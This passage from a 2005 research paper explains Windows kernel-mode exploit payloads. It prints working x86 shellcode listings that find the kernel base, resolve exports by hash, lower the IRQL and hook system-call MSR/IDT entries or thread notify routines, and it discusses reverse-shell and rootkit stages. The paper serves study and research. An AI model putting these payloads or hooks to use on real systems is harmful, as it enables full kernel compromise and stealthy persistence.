Windows Kernel-mode Payload Fundamentals bugcheck & skape Dec 12, 2005 1) Foreword Abstract: This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows. Thanks: The authors would like to thank Barnaby Jack and Derek Soeder from eEye for their great paper on ring 0 payloads. Thanks also go out to jt, spoonm, vax, and everyone at nologin. Disclaimer: The subject matter discussed in this document is presented in the interest of education. The authors cannot be held responsible for how the information is used. While the authors have tried to be as thorough as possible in their analysis, it is possible that they have made one or more mistakes. If a mistake is observed, please contact one or both of the authors so that it can be corrected. Notes: In most cases, testing was performed on Windows 2000 SP4 and Windows XP SP0. Compatibility with other operating system versions, such as XP SP2, was inferred by analyzing structure offsets and disassemblies. It is theorized that many of the implementations described in this document are also compatible with Windows 2003 Server SP0/SP1, but due to lack of a functional 2003 installation, testing could not be performed. 2) Introduction The subject of exploiting user-mode vulnerabilities and the payloads required to take advantage of them is something that has been discussed at length over the course of the past few years. With this realization finally starting to set in, security vendors have begun implementing security products that are designed to prevent the exploitation of user-mode vulnerabilities through a number of different techniques. There is a shift afoot, however, and it has to do with attacker focus being shifted from user-mode vulnerabilities toward the realm of kernel-mode vulnerabilities. The reasons for this shift are due in part to the inherent value of a kernel-mode vulnerability and to the relatively unexplored nature of kernel-mode vulnerabilities, which is something that most researchers find hard to resist. To help aide in the shift from user-mode to kernel-mode, this paper will explore and extend the topic of kernel-mode payloads on Windows. The reason that kernel-mode payloads are important is because they are the method of actually doing something meaningful with a kernel-mode vulnerability. Without a payload, the ability to control code execution means nothing more than having the ability to cause a denial of service. Barnaby Jack and Derek Soeder from eEye have done a great job in kicking off the public research into this area. Just like user-mode payloads on Windows, kernel-mode payloads can be broken down into general techniques and algorithms that are applicable to most payloads. These techniques and algorithms will be discussed in chapter . Furthermore, both user-mode and kernel-mode payloads can be broken down into a set of payload components that can be combined together to form a single logical payload. A payload component is simply defined as an autonomous unit of a payload that has a specific purpose. For instance, both user-mode and kernel-mode payloads have an optional component called a stager that can be used to execute a second logical payload component known as a stage. One major distinction between kernel-mode and user-mode payloads, however, is that kernel-mode payloads are burdened with some extra considerations that are not found in user-mode payloads, and for that reason are broken down into a few more distinct payload components. These extra components will be discussed at length in chapter . The purpose of this document is to provide the reader with a point of reference for the major aspects common to most all kernel-mode payloads. To simplify terminology, kernel-mode payloads will be referred to throughout the document as R0 payloads, short for ring 0, which symbolizes the processor ring that kernel-mode operates at on x86. For the same reason, user-mode payloads will be referred to throughout the document as R3 payloads, short for ring 3. To fully understand this paper, the reader should have a basic understanding of Windows kernel-mode programming. In order to limit the scope of this document, the methods that can be used to achieve code execution through different vulnerability scenarios will not be discussed at length. The main reason for this is that general approaches to payload implementation are typically independent of the vulnerability in which they are used for. However, references to some of the research in this area can be found in the bibliography for readers who might be curious. Furthermore, this document will not expand upon some of the interesting things that can be done in the context of a kernel-mode payload, such as keyboard sniffing. Instead, the topic of advanced kernel-mode payloads will be left for future research. The authors hope that by describing the various elements that will compose most all kernel-mode payloads, the process involved in implementing some of the more interesting parts will be made easier. With all of the formalities out of the way, the first leap to take is one regarding an understanding of some of the general techniques that can be applied to kernel-mode payloads, and it's there that the journey begins. 3) General Techniques This chapter will outline some of the techniques and algorithms that are generally applicable to most kernel-mode payloads. For example, kernel-mode payloads may find it necessary to resolve certain exported symbols for use within the payload itself, much the same as user-mode payloads find it necessary. 3.1) Finding Ntoskrnl.exe Base Address One of the pre-requisites to nearly all user-mode payloads on Windows is a stub that is responsible for locating the base address of kernel32.dll. In kernel-mode, the logical equivalent to kernel32.dll is ntoskrnl.exe, also known more succinctly as nt. The purpose of nt is to implement the heart of the kernel itself and to provide the core library interface to device drivers. For that reason, a lot of the routines that are exported by nt may be of use to kernel-mode payloads. This makes locating the base address of nt important because it is what facilitates the resolving of exported symbols. This section will describe a few techniques that can be used to locate the base address of nt. One general technique that is taken to find the base address of nt is to reliably locate a pointer that exists somewhere within the memory mapping for nt and to scan down toward lower addresses until the MZ checksum is found. This technique will be referred to as a scandown technique since it involves scanning downward toward lower addresses. This is completely synonymous with the mid-delta term used by eEye, but just clarified to indicate a direction. In the implementations provided below, each makes use of an optimization to walk down in PAGESIZE decrements. However, this also adds four bytes to the amount of space taken up by the stub. If size is a concern, walking down byte-by-byte as is done in the eEye paper can be a great way to save space. Another thing to keep in mind with some of these implementations is that they may fail if the /3GB boot flag is specified. This is not generally very common, but it could be something that is encountered in the real world. 3.1.1) IDT Scandown +---------+----------+ | Size: | 17 bytes | | Compat: | All | | Credit: | eEye | +---------+----------+ The approach for finding the base address of nt discussed in eEye's paper involved finding the high-order word of an IDT handler that was set to a symbol somewhere inside nt. After acquiring the symbol address, the payload simply walked down toward lower addresses in memory byte-by-byte until it found the MZ checksum. The following disassembly shows the approach taken to do this: 00000000 8B3538F0DFFF mov esi,[0xffdff038] 00000006 AD lodsd 00000007 AD lodsd 00000008 48 dec eax 00000009 81384D5A9000 cmp dword [eax],0x905a4d 0000000F 75F7 jnz 0x8 This approach is perfectly fine, however, it could be prone to error if the four checksum bytes were found somewhere within nt which did not actually coincide with its base address. This issue is one that is present to any scandown technique (referred to as ``mid-deltas'' by eEye). However, scanning down byte-by-byte can be seen as potentially more error prone, but this is purely conjecture at this point as the authors are aware of no specific cases in which it would fail. It may also fail if the direction flag is not cleared, though the chances of this happening are minimal. One other limiting factor may be the presence of the NULL byte in the comparison. It is possible to slightly improve (depending upon which perspective one is looking at it from) this approach by scanning downward one page at a time and by eliminating the need to clear the direction flag It is not possible walk downward in 16-page decrements due to the fact that 16 page alignment is not guaranteed universally in kernel-mode. This also eliminates the presence of NULL bytes. However, some of these changes lead to the code being slightly larger (20 bytes total): 00000000 6A38 push byte +0x38 00000002 5B pop ebx 00000003 648B03 mov eax,[fs:ebx] 00000006 8B4004 mov eax,[eax+0x4] 00000009 662501F0 and ax,0xf001 0000000D 48 dec eax 0000000E 6681384D5A cmp word [eax],0x5a4d 00000013 75F4 jnz 0x9 3.1.2) KPRCB IdleThread Scandown +---------+----------+ | Size: | 17 bytes | | Compat: | All | +---------+----------+ The base address of nt can also be found by looking at the IdleThread attribute of the KPRCB for the current KPCR. As it stands, this attribute always appears to point to a global variable inside of nt. Just like the IDT scandown approach, this technique uses the symbol as a starting point to walk down and find the base address of nt by looking for the MZ checksum. The following disassembly shows how this is accomplished: 00000000 A12CF1DFFF mov eax,[0xffdff12c] 00000005 662501F0 and ax,0xf001 00000009 48 dec eax 0000000A 6681384D5A cmp word [eax],0x5a4d 0000000F 75F4 jnz 0x5 This approach will fail if it happens that the IdleThread attribute does not point somewhere within nt, but thus far a scenario such as this has not been observed. It would also fail if the Kprcb attribute was not found immediately after the Kpcr, but this has not been observed in testing. 3.1.3) SYSENTER_EIP_MSR Scandown +---------+------------------------------------+ | Size: | 19 bytes | | Compat: | XP, 2003 (modern processors only) | +---------+------------------------------------+ For processors that support the system call MSR 0x176 (SYSENTER_EIP_MSR), the base address of nt can be found by reading the registered system call handler and then using the scandown technique to find the base address. The following disassembly illustrates how this can be accomplished: 00000000 6A76 push byte +0x76 00000002 59 pop ecx 00000003 FEC5 inc ch 00000005 0F32 rdmsr 00000007 662501F0 and ax,0xf001 0000000B 48 dec eax 0000000C 6681384D5A cmp word [eax],0x5a4d 00000011 75F4 jnz 0x7 3.1.4) Known Portable Base Scandown +---------+--------------------+ | Size: | 17 bytes | | Compat: | 2000, XP, 2003 SP0 | +---------+--------------------+ A quick sampling of base addresses across different major releases show that the base address of nt is always within a certain range. The one exception to this in the polling was Windows 2003 Server SP1, and for that reason this payload is not compatible. The basic idea is to simply use an offset that is known to reside within the region that nt will be mapped at on different operating system versions. The table below describes the mapping ranges for nt on a few different samplings: +------------------+--------------+-------------+ | Platform | Base Address | End Address | +------------------+--------------+-------------+ | Windows 2000 SP4 | 0x80400000 | 0x805a3a00 | | Windows XP SP0 | 0x804d0000 | 0x806b3f00 | | Windows XP SP2 | 0x804d7000 | 0x806eb780 | | Windows 2003 SP1 | 0x80800000 | 0x80a6b000 | +------------------+--------------+-------------+ As can be seen from the table, the address 0x8050babe resides within every region that nt could be mapped at except for Windows 2003 Server SP1. The payload below implements this approach: 00000000 B8BEBA5080 mov eax,0x8050babe 00000005 662501F0 and ax,0xf001 00000009 48 dec eax 0000000A 6681384D5A cmp word [eax],0x5a4d 0000000F 75F4 jnz 0x5 3.2) Resolving Symbols +---------+----------+ | Size: | 67 bytes | | Compat: | All | +---------+----------+ Another aspect common to almost all payloads on Windows is the use of code that walks the export directory of an image to resolve the address of a symbol The technique of walking the export directory to resolve symbols has been used for ages, so don't take the example here to be the first ever use of it. In the kernel, things aren't much different. Barnaby refers to the use of a two-byte XOR/ROR hash in the eEye paper. Alternatively, a four byte hash could be used, but as pointed out in the eEye paper, this leads to a waste of space when two-byte hash could suffice equally well provided there are no collisions. The approach implemented below involves passing a two-byte hash in the ebx register (the high order bytes do not matter) and the base address of the image to resolve against in the ebp register. In order to save space, the code below is designed in such a way that it will transfer execution into the function after it resolves it, thus making it possible to resolve and call the function in one step without having to cache addresses. In most cases, this leads to a size efficiency increase. 00000000 60 pusha 00000001 31C9 xor ecx,ecx 00000003 8B7D3C mov edi,[ebp+0x3c] 00000006 8B7C3D78 mov edi,[ebp+edi+0x78] 0000000A 01EF add edi,ebp 0000000C 8B5720 mov edx,[edi+0x20] 0000000F 01EA add edx,ebp 00000011 8B348A mov esi,[edx+ecx*4] 00000014 01EE add esi,ebp 00000016 31C0 xor eax,eax 00000018 99 cdq 00000019 AC lodsb 0000001A C1CA0D ror edx,0xd 0000001D 01C2 add edx,eax 0000001F 84C0 test al,al 00000021 75F6 jnz 0x19 00000023 41 inc ecx 00000024 6639DA cmp dx,bx 00000027 75E3 jnz 0xc 00000029 49 dec ecx 0000002A 8B5F24 mov ebx,[edi+0x24] 0000002D 01EB add ebx,ebp 0000002F 668B0C4B mov cx,[ebx+ecx*2] 00000033 8B5F1C mov ebx,[edi+0x1c] 00000036 01EB add ebx,ebp 00000038 8B048B mov eax,[ebx+ecx*4] 0000003B 01E8 add eax,ebp 0000003D 8944241C mov [esp+0x1c],eax 00000041 61 popa 00000042 FFE0 jmp eax To understand how this function works, take for example the resolution of nt!ExAllocatePool. First, a hash of the string ``ExAllocatePool'' must be obtained using the same algorithm that the payload uses. For this payload, the result is 0x0311b83f This was calculated by doing perl -Ilib -MPex::Utils -e "printf .8x, Pex::Utils::Ror(Pex::Utils::RorHash("ExAllocatePool"), 13);". Since the implementation uses a two-byte hash, only 0xb83f is needed. This hash is then stored in the bx register. Since ExAllocatePool is found within nt, the base address of nt must be passed in the ebp register. Finally, in order to perform the resolution, the arguments to nt!ExAllocatePool must be pushed onto the stack prior to calling the resolution routine. This is because the resolution routine will transfer control into nt!ExAllocatePool after the resolution succeeds and therefore must have the proper arguments on the stack. One downside to this implementation is that it won't support the resolution of data exports (since it tries to jump into them). However, for such a purpose, the routine could be modified to simply not issue the jmp instruction and instead rely on the caller to execute it. It is also important for payloads that use this resolution technique to clear the direction flag with cld. 4) Payload Components This chapter will outline four distinct components that can be used in conjunction with one another to produce a logical kernel-mode payload. Unlike user-mode vulnerabilities, kernel-mode vulnerabilities tend to be a bit more involved when it comes to considerations that must be made when attempting to execute code after successfully exploiting a target. These concerns include things like IRQL considerations, setting up code for execution, gracefully continuing execution, and what action to actually perform. Some of these steps have parallels to user-mode payloads, but others do not. The first consideration that must be made when implementing a kernel-mode payload is whether or not the IRQL that the payload will be running at is a concern. For instance, if the payload will be making use of functions that require the processor to be running at PASSIVE_LEVEL, then it may be necessary to ensure that the processor is transitioned to a safe IRQL. This consideration is also dependent on the vulnerability in question as to whether or not the IRQL will even be a problem. For scenarios where it is a problem, a migration payload component can be used to ensure that the code that requires a specific IRQL is executed in a safe manner. The second consideration involves staging either a R3 payload (or secondary R0 payload) to another location for execution. This payload component is encapsulated by a stager which has parallels to payload stagers found in typical user-mode payloads. Unlike user-mode payloads, though, kernel-mode stagers are typically designed to execute code in another context, such as in a user-mode process or in another kernel-mode thread context. As such, stagers may sometimes overlap with the purpose of the migration component, such as when the act of staging leads to the stage executing at a safe IRQL, and can therefore be considered a superset of a migration component in that case. The third consideration has to do with how the payload gracefully restores execution after it has completed. This portion of a kernel-mode payload is classified as the recovery component. In short, the recovery component of a payload finds a way to make sure that the kernel does not crash or otherwise become unusable. If the kernel were to crash, any code that the payload had intended to execute may not actually get a chance to run depending on how the payload is structured. As such, recovery is one of the most volatile and critical aspects of a kernel-mode payload. Finally, and most importantly, the fourth component of a kernel-mode payload is the stage component. It is this component that actually performs the real work of the payload. For instance, a stage component might detect that it's running in the context of lsass.exe and create a reverse shell in user-mode. As another example of a stage component, eEye demonstrated a keyboard hook that sent keystrokes back in ICMP echo responses from the host. Stages have a very broad definition. The following sections will explain each one of the four payload components in detail and offer techniques and implementations that can be used under certain situations. 4.1) Migration One of the things that is different about kernel-mode vulnerabilities in relation to user-mode vulnerabilities is that the Windows kernel operates internally at specific Interrupt Request Levels, also known as IRQLs. The purpose of IRQLs are to allow the kernel to mask off interrupts that occur at a lower level than the one that the processor is currently executing at. This ensures that a piece of code will run un-interrupted by threads and hardware/software interrupts that have a lesser priority. It also allows the kernel to define a driver model that ensures that certain operations are not performed at critical processor IRQLs. For instance, it is not permitted to block at any IRQL greater than or equal to DISPATCH_LEVEL. It is also not permitted to reference pageable memory that has been paged out at greater than or equal to DISPATCH_LEVEL. The reason this is important is because the IRQL that the processor will be running at when a kernel-mode vulnerability is triggered is highly dependent upon the area in which the vulnerability occurs. For this reason, it may be generally necessary to have an approach for either directly or indirectly lowering the IRQL in such a way that permits the use of some of the common driver support routines. As an example, it is not possible to call nt!KeInsertQueueApc at an IRQL greater than PASSIVE_LEVEL. This section will focus on describing methods that could be used to implement migration payloads. The purpose of a migration payload is to migrate the processor to an IRQL that will allow payloads to make use of pageable memory and common driver support routines as described above. The techniques that can be used to do this vary in terms of stability and simplicity. It's generally a matter of picking the right one for the job. 4.1.1) Direct IRQL Adjustment +---------+------------------+ | Type: | R0 IRQL Migrator | | Size: | 6 bytes | | Compat: | All | +---------+------------------+ One of the most straight-forward approaches that can be taken to migrate a payload to a safe IRQL is to directly lower a processor's IRQL. This approach was first proposed by eEye and involved resolving and calling hal!KeLowerIrql with the desired IRQL, such as PASSIVE_LEVEL. This technique is very dangerous due to the way in which IRQLs are intended to be used. The direct lowering of an IRQL can lead to machine deadlocks and crashes due to unsafe assumptions about locks being held, among other things. An optimization to the hal!KeLowerIrql technique is to perform the operation that hal!KeLowerIrql actually performs. Specifically, hal!KeLowerIrql is a simple wrapper for hal!KfLowerIrql which adjusts the Irql attribute of the KPCR structure for a specific processor to the supplied IRQL (as well as calling software interrupt handlers for masked IRQLs). To implement a payload that migrates to a safe IRQL, all that is required is to adjust the value at fs:0x24, such as by lowering it to PASSIVE_LEVEL as shown below In kernel-mode, the fs segment points to the current processor's KPCR structure. 00000000 31C0 xor eax,eax 00000002 64894024 mov [fs:eax+0x24],eax One concern about taking this approach over calling hal!KeLowerIrql is that the soft-interrupt handlers associated with interrupts that were masked while at a raised IRQL will not be called. It is unclear whether or not this could lead to a deadlock, but is theorized that the answer could be yes. However, the authors did test writing a driver that raised to HIGHLEVEL, spun for a period of time (during which kb/mouse interrupts were sent), and then manually adjusted the IRQL as described above. There appeared to be no adverse side effects, but it has not been ruled out that a deadlock could be possible Consequently, if anyone knows a definitive answer to this, the authors would love to hear it. Aside from the risks, this approach is nice because it is very small (6 bytes), so assuming there are no significant problems with it, then the use of this method would be a no-brainer given the right set of circumstances for a vulnerability. 4.1.2) System Call MSR/IDT Hooking +---------+------------------+ | Type: | R0 IRQL Migrator | | Size: | 97 bytes | | Compat: | All | +---------+------------------+ One relatively simple way of migrating a R0 payload to a safe IRQL is by hooking the function used to dispatch system calls in kernel-mode through the use of a processor model-specific register. In newer processors, system calls are dispatched through an improved interface that takes advantage of a registered function pointer that is given control when a system call is dispatched. The function pointer is stored within the STAR model-specific register that has a symbolic code of 0x176. To take advantage of this on Windows XP+ for the purpose payload migration, all that is required is to first read the current state of the MSR so that the original system call dispatcher routine can be preserved. After that, the second stage of the R0 payload must be copied to another location, preferably globally accessible and unused, such as SharedUserData or the KPRCB. Once the second stage has been copied, the value of the MSR can be changed to point to the first instruction of the now-copied stage. The end result is that whenever a system call is dispatched from user-mode, second stage of the R0 payload will be executed as IRQL = PASSIVE. For Windows 2000, and for versions of Windows XP+ running on older hardware, another approach is required that is virtually equivalent. Instead of changing the processor MSR, the IDT entry for the 0x2e soft-interrupt that is used to dispatch system calls must be hooked so that whenever the soft-interrupt is triggered the migrated R0 payload is called. The steps taken to copy the second stage to another location are the same as they would be under the MSR approach. The following steps outline one way in which a stager of this type could be implemented for Windows 2000 and Windows XP. 1. Determining which system call vector to hook. By checking KUSER_SHARED_DATA.NtMinorVersion located at 0xffdf0270 for a value of 0 it is safe to assume the IDT will need to be hooked since the syscall/sysenter instructions are not used in Windows 2000, otherwise the hook should be installed in the MSR:0x176 register. Note however that it is possible Windows XP will not use this method under rare circumstances. Also an assumption of NtMajorVersion being 5 is made. 2. Caching the existing service routine address If the MSR register is to be hooked the current value can be retrieved by placing the symbolic code of 0x176 in ecx and using the rdmsr instruction. The existing value will be returned in edx:eax. If the IDT entry at index 0x2e is to be hooked it can be retrieved by first obtaining the processors IDT base using the sidt instruction. The entry then can be located at offset 0x170 relative to the base since the IDT is an array of KIDTENTRY structures. Lastly the address of the code that services the interrupt is in KIDTENTRY with the low word at Offset and high word at ExtendedOffset. The following is the definition of KIDTENTRY. DTENTRY +0x000 Offset : Uint2B +0x002 Selector : Uint2B +0x004 Access : Uint2B +0x006 ExtendedOffset : Uint2B 3. Migrating the payload A relatively safe place to migrate the payload to is the free space after the first processors KPCR structure. An arbitrary value of 0xffdffd80 is used to cache the current service routine address and the remainder of the payload is copied to 0xffdffd84 followed by a an indirect jump to the original service routine using jmp [0xffdffd80]. Note that a payload is responsible for maintaining all registers before calling the original service routine with this implementation. The payload also may not exceed the end of the memory page, thus limiting its size to 630 bytes. Historically, R0 shellcode has been put in the space after SharedUserData since it is exposed to all processes at R3. However, that could have its disadvantages if the payload has no requirements to be accessed from R3. The down side is the smaller amount of free space available. 4. Hooking the service routine Using the same methods described to cache the current service routine are used to hook. For hooking the IDT, interrupts are temporarily disabled to overwrite the KIDTENTRY Offset and ExtendedOffset fields. Disabling interrupts on the current processor will still be safe in multiprocessor environments since IDTs are maintained on a per processor basis. For hooking the MSR, the new service routine is placed in edx:eax (for this case 0x0:0xffdffd84), 0x176 in ecx, and issue a wrmsr instruction. The following code illustrates an implementation of this type of staging payload. It's roughly 97 bytes in size, excluding the staged payload and the recovery method. Removing the support for hooking the IDT entry reduces the size to roughly 47 bytes. 00000000 FC cld 00000001 BF80FDDFFF mov edi,0xffdffd80 00000006 57 push edi 00000007 6A76 push byte +0x76 00000009 58 pop eax 0000000A FEC4 inc ah 0000000C 99 cdq 0000000D 91 xchg eax,ecx 0000000E 89F8 mov eax,edi 00000010 66B87002 mov ax,0x270 00000014 3910 cmp [eax],edx 00000016 EB06 jmp short 0x1e 00000018 50 push eax 00000019 0F32 rdmsr 0000001B AB stosd 0000001C EB3E jmp short 0x5c 0000001E 648B4238 mov eax,[fs:edx+0x38] 00000022 8D4408FA lea eax,[eax+ecx-0x6] 00000026 50 push eax 00000027 91 xchg eax,ecx 00000028 8B4104 mov eax,[ecx+0x4] 0000002B 668B01 mov ax,[ecx] 0000002E AB stosd 0000002F EB2B jmp short 0x5c 00000031 5E pop esi 00000032 6A01 push byte +0x1 00000034 59 pop ecx 00000035 F3A5 rep movsd 00000037 B8FF2580FD mov eax,0xfd8025ff 0000003C AB stosd 0000003D 66C707DFFF mov word [edi],0xffdf 00000042 59 pop ecx 00000043 58 pop eax 00000044 0404 add al,0x4 00000046 85C9 test ecx,ecx 00000048 9C pushf 00000049 FA cli 0000004A 668901 mov [ecx],ax 0000004D C1E810 shr eax,0x10 00000050 66894106 mov [ecx+0x6],ax 00000054 9D popf 00000055 EB04 jmp short 0x5b 00000057 31D2 xor edx,edx 00000059 0F30 wrmsr 0000005B C3 ret ; replace with recovery method 0000005C E8D0FFFFFF call 0x31 ... R0 stage here ... 4.1.3) Thread Notify Routine +---------+------------------+ | Type: | R0 IRQL Migrator | | Size: | 127 bytes | | Compat: | 2000, XP | +---------+------------------+ Another technique that can be used to migrate a payload to a safe IRQL involves setting up a thread notify routine which is normally done by calling nt!PsSetCreateThreadNotifyRoutine. Unfortunately, the documentation states that this routine can only be called at PASSIVE_LEVEL, thus making it appear as if calling it from a payload would lead to problems. While this is true, it is also possible to manually create a notify routine by modifying the global array of thread notify routines. Although this array is not exported, it is easy to find by extracting an address reference to it from one of either nt!PsSetCreateThreadNotifyRoutine or nt!PsRemoveCreateThreadNotifyRoutine. By using this basic approach, it is possible to write a migration payload that transitions to PASSIVE_LEVEL by registering a callback that is called whenever a thread is created or deleted. In more detail, a few steps must be taken in order to get this to work properly on 2000 and XP. The steps taken on 2003 should be pretty much the same as XP, but have not been tested. 1. Find the base address of nt The base address of nt must be located so that an exported symbol can be resolved. 2. Determine the current operating system Since the method used to install the thread notify routines differ between 2000 and XP, a check must be made to see what operating system the payload is currently running on. This is done by checking the NtMinorVersion attribute of KUSER_SHARED_DATA at 0xffdf0270. 3. Shift edi to point to the storage buffer Due to the fact that it can't be generally assumed that the buffer the payload is running from will stick around until the notify routine is called, the stage associated with the payload must be copied to another location. In this case, the payload is copied to a buffer starting at 0xffdf04e0. 4. If the payload is running on XP On XP, the technique used to register the thread notify routine requires creating a callback structure in a global location and manually inserting it into the nt!PspCreateThreadNotifyRoutine array. This has to be done in order to avoid IRQL issues. For that reason, a fake callback structure is created and is designed to be stored at 0xffdf04e0. The actual code that will be executed will be copied to 0xffdf04e8. The function pointer inside the callback structure is located at offset 0x4, but in the interest of size, both of the first attributes are initialized to point to 0xffdf04e8. It is also important to note that on XP, the nt!PspCreateThreadNotifyRoutineCount must be incremented so that the notify routine will actually be called. Fortunately, for versions of XP currently tested, this value is located 0x20 bytes after the notify routine array. 5. If the payload is running on 2000 On 2000, the nt!PspCreateThreadNotifyRoutine is just an array of function pointers. For that reason, registering the notify routine is much simpler and can actually be done by calling nt!PsSetCreateThreadNotifyRoutine without much of a concern since no extra memory is allocated. By calling the real exported routine directly, it is not necessary to manually increment the nt!PspCreateThreadNotifyRoutineCount. Furthermore, doing so would not be as easy as it is on XP because the count variable is located quite a distance away from the array itself. 6. Resolve the exported symbol The symbol resolution approach taken in this payload involves comparing part of an exported symbol's name with ``dNot''. This is done because on XP, the actual symbol needed in order to extract the address of nt!PspCreateThreadNotifyRoutine is found a few bytes into nt!PsRemoveCreateThreadNotifyRoutine. However, on 2000, the address of nt!PsSetCreateThreadNotifyRoutine needs to be resolved as it is going to be directly called. As such, the offset into the string that is compared between 2000 and XP differs. For 2000, the offset is 0x10. For XP, the offset is 0x13. The end result of the resolution process is that if the payload is running on XP, the eax register will hold the address of nt!PsRemoveCreateThreadNotifyRoutine and if it's running on 2000 it will hold the address of nt!PsSetCreateThreadNotifyRoutine. 7. Copy the second stage payload Once the symbol has been resolved, the second stage payload is copied to the destination described in an earlier step. 8. Set up the notify routine entry If the payload is running on XP, a fake callback structure is manually inserted into the nt!PspCreateThreadNotifyRoutine array and the nt!PspCreateThreadNotifyRoutineCount is manually incremented. If the payload is running on 2000, a direct call to nt!PsSetCreateThreadNotifyRoutine is issued with the pointer to the copied second stage as the notify routine to be registered. A payload that implements the thread notify routine approach is shown below: 00000000 FC cld 00000001 A12CF1DFFF mov eax,[0xffdff12c] 00000006 48 dec eax 00000007 6631C0 xor ax,ax 0000000A 6681384D5A cmp word [eax],0x5a4d 0000000F 75F5 jnz 0x6 00000011 95 xchg eax,ebp 00000012 BF7002DFFF mov edi,0xffdf0270 00000017 803F01 cmp byte [edi],0x1 0000001A 66D1C7 rol di,1 0000001D 57 push edi 0000001E 750E jnz 0x2e 00000020 89F8 mov eax,edi 00000022 83C008 add eax,byte +0x8 00000025 AB stosd 00000026 AB stosd 00000027 57 push edi 00000028 6A06 push byte +0x6 0000002A 6A13 push byte +0x13 0000002C EB05 jmp short 0x33 0000002E 57 push edi 0000002F 6A81 push byte -0x7f 00000031 6A10 push byte +0x10 00000033 5A pop edx 00000034 31C9 xor ecx,ecx 00000036 8B7D3C mov edi,[ebp+0x3c] 00000039 8B7C3D78 mov edi,[ebp+edi+0x78] 0000003D 01EF add edi,ebp 0000003F 8B7720 mov esi,[edi+0x20] 00000042 01EE add esi,ebp 00000044 AD lodsd 00000045 41 inc ecx 00000046 01E8 add eax,ebp 00000048 813C10644E6F74 cmp dword [eax+edx],0x746f4e64 0000004F 75F3 jnz 0x44 00000051 49 dec ecx 00000052 8B5F24 mov ebx,[edi+0x24] 00000055 01EB add ebx,ebp 00000057 668B0C4B mov cx,[ebx+ecx*2] 0000005B 8B5F1C mov ebx,[edi+0x1c] 0000005E 01EB add ebx,ebp 00000060 8B048B mov eax,[ebx+ecx*4] 00000063 01E8 add eax,ebp 00000065 59 pop ecx 00000066 85C9 test ecx,ecx 00000068 8B1C08 mov ebx,[eax+ecx] 0000006B EB14 jmp short 0x81 0000006D 5E pop esi 0000006E 5F pop edi 0000006F 6A01 push byte +0x1 00000071 59 pop ecx 00000072 F3A5 rep movsd 00000074 7808 js 0x7e 00000076 5F pop edi 00000077 893B mov [ebx],edi 00000079 FF4320 inc dword [ebx+0x20] 0000007C EB02 jmp short 0x80 0000007E FFD0 call eax 00000080 C3 ret 00000081 E8E7FFFFFF call 0x6d ... R0 stage here ... The R0 stage must keep in mind that it will be called in the context of a callback, so in order to ensure graceful recovery the stage must issue a ret 0xc or equivalent instruction upon completion. The R0 stage must also be capable of being re-entered without having any adverse side effects. This approach may also be compatible with 2003, but tests were not performed. This payload could be made significantly smaller if it were targeted to a specific OS version. One major benefit to this approach is that the stage will be passed arguments that are very useful for R3 code injection, such as a ProcessId and ThreadId. This approach has quite a few cons. First, the size of the payload alone makes it less useful due to all the work required to just migrate to a safe IRQL. Furthermore, this payload also relies on offsets that may be unreliable across new versions of the operating system, specifically on XP. It also depends on the pages that the notify routine array resides at being paged in at the time of the registration. If they are not, the payload will fail if it is running at a raised IRQL that does not permit page faults. 4.1.4) Hooking Object Type Initializer Procedures One theoretical way that could be used to migrate to a safe IRQL would be to hook into one of the generalized object type initializer procedures associated with a specific object type, such as nt!PsThreadType or nt!PsProcessType These procedures can be found in the OBJECTTYPEINITIALIZER structure. The method taken to do this would be to first resolve one of the exported object types and then alter one of the procedure attributes, such as the OpenProcedure, to point into a buffer that contains the payload to execute. The payload could then make a determination on whether or not it's safe to execute based on the current IRQL. It may also be safe, in some cases, to to assume that the IRQL will be PASSIVE_LEVEL for a given object type procedure. Matt Conover also describes how this can be done in his Malware Profiling and Rootkit Detection on Windows paper. Thanks to Derek Soeder for suggesting this approach. 4.1.5) Hooking KfRaiseIrql This approach was suggested by Derek Soeder could be quite reliable as an IRQL migration component. The basic concept would be to resolve and hook hal!KfRaiseIrql. Inside the hook routine, a check could be performed to see if the current IRQL is passive and, if so, run the rest of the payload. However, as Derek points out, one of the problems with this approach would center around the method used to hook the function considering it'd be somewhat expensive to do a detours-style preamble hook (although it's fairly easy to disable write protection). Still, this approach shows a good line of thinking that could be used to get to a safe IRQL. 4.2) Stagers The stager payload component is designed to set up the execution of a separate payload either at R0 or R3. This payload component is pretty much equivalent to the concept of stagers in user-mode payloads, but instead of reading in a payload off the wire for execution, R0 stagers typically have the staged payload tacked on to the stager already since there is no elegant method of reading in a second stage from the network without consuming a lot of space in the process. This section will describe some of the techniques that can be used to execute a stage at either R0 or R3. The techniques that are theoretical and do not have proof of concept code will be described as such. Although most stagers involve reading more code in off the wire, it could also be possible to write an egghunt style stager that searches the address space for an egg that is prepended or appended to the code that should be executed. The only requirement would be that there be some way to get the second stage somewhere in the address space for a long enough period of time. Given the right conditions, this approach for staging can be quite useful because it reduces the size of the initial payload that has to be transmitted or included as part of the exploitation request. 4.2.1) System Call Return Address Overwrite A potentially useful way to stage code to R3 would be to hook the system call MSR and then alter the return address of the R3 stack to point to the stage that is to be executed. This would mean that whenever a system call occurred, the return path would bounce through the stage and then into the actual return address. This is an interesting vantage point for stages because it could give them the ability to filter data that is passed back to actual processes. This could be potentially make it possible for an attacker to install a very simple memory-resident root-kit as a result of taking advantage of a vulnerability. This approach is purely theoretical, but it is thought that it could be made to work without very much overhead. The basic implementation for such a stager would be to first copy the staged payload to a globally accessible location, such as SharedUserData. Once copied, the next step would be to hook the processor MSR for the system call instruction. The hook routine for the system call instruction would then alter the return address of the user-mode stack when called to point to the stage's global address and should also make it so the stage can restore execution to the actual return address after it has completed. Once the return address has been redirected, the actual system call can be issued. When the system call returns, it would execute the stage. The stage, once completed, would then restore registers, such as eax, and transfer control to the actual return address. This approach would be very transparent and should be completely reliable. The added benefits of being able to filter system call results make it very interesting from a memory-resident rootkit perspective. 4.2.2) Thread APC One of the most logical ways to go about staging a payload from R0 to R3 is through the use of Asynchronous Procedure Calls (APCs). The purpose of an APC is to allow code to be executed in the context of an existing thread without disrupting the normal course of execution for the thread. As such, it happens to be very useful for R0 payloads that want to run an R3 payload. This is the technique that was discussed at length in the eEye's paper. A few steps are required to accomplish this. First, the R3 payload must be copied to a location that will be accessible from a user-mode process, 